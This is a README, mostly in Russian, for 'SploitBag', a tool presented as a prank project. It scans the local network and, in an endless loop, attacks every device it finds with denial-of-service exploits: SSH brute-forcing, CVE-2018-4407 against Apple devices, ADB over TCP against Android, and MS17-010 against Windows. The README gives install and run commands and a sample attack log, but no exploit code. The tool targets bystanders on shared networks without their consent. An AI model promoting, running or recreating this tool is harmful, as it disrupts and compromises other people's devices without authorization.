# SploitBag

## Цель

Фановый проект для того, чтобы привнести веселье в жизнь тех, кто не думает о информационной безопасности или заб(ы/и)л на нее.

# Implemented

- DOS via bruteforcing SSH & command executing
- Apple DOS via CVE-2018-4407
- Android DOS via ADB over TCP & command executing
- Windows DOS via MS17-010 & command executing

## Описание реализации и скоуп

0. Вы уже должны быть подключенны к сети, в которой будете гонять экспоиты по девайсам, которые обнаружатся
1. После подключения к сети (как мы уже сказали ранее нам пофиг как это будет сделанно) приложение проводит сканирование сети на наличие девайсов и открытых портов у них
2. После этого к каждому хосту на основе его характеристик и открытых портом будт применяться эксполиты, которые могут быть проэксплуатированны (а может и не могут быть)
3. После того, как все девайсы в уже "вашей" сети будут проэксплуатированны все повторится с пункта 1 и так по кругу

# Что делать

0. `pip install -r requirements.txt`
1. `vim sploitbag/config.json`
2. узнать свою [CIDR](https://goo.gl/9BRDXb) или пользоваться `autoheck`
3. `sudo python sploitbag.py -h`
4. ...

# Example

```
(.venv) ➜  sploitbag git:(master) ✗ sudo python sploitbag.py 192.168.88.198/32 -a exploiting
2019-01-06 01:09:47,085 root[nmap.py] INFO Starting the mapping of the network with CIDR: 192.168.88.198/32 (size: 1)
2019-01-06 01:09:53,894 root[exploit.py] DEBUG SSHDOS: Bruteforce 192.168.88.198
2019-01-06 01:09:53,895 root[ssh.py] DEBUG Bruteforce attempt 0
2019-01-06 01:09:54,078 root[ssh.py] DEBUG Bruteforce attempt 1
2019-01-06 01:09:54,242 root[ssh.py] DEBUG Bruteforce attempt 2
2019-01-06 01:09:54,416 root[ssh.py] DEBUG Bruteforce attempt 3
2019-01-06 01:09:54,583 root[ssh.py] DEBUG Bruteforce attempt 4
2019-01-06 01:09:54,755 root[exploit.py] DEBUG Apple: CVE-2018-4407 192.168.88.198
.
Sent 1 packets.
(.venv) ➜  sploitbag git:(master) ✗
```